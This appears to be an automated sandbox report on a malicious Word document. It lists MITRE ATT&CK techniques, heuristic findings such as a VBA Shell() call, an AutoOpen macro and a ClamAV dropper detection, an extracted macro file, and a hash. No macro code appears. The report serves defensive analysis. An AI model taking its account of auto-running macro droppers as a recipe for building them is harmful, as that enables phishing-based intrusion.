Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing a VBA macro. The macro includes a Shell() call, which is a critical finding, indicating an attempt to execute arbitrary commands. The presence of the 'AutoOpen' macro and the ClamAV detection name 'Doc.Dropper.Agent-6911940-0' strongly suggest this document is designed to drop and execute a secondary payload. No specific family could be identified, but the technique is consistent with a macro-based downloader.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6911940-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6911940-0.
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body; this is the standard OOXML DrawingML schema namespace)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 64790 bytes |

SHA-256: f99e35019bdccc06c491f33d774415609ca1b73e4380b5fe8589f0a21793720c
Preview script: first 1,000 lines of the extracted (obfuscated) VBA script.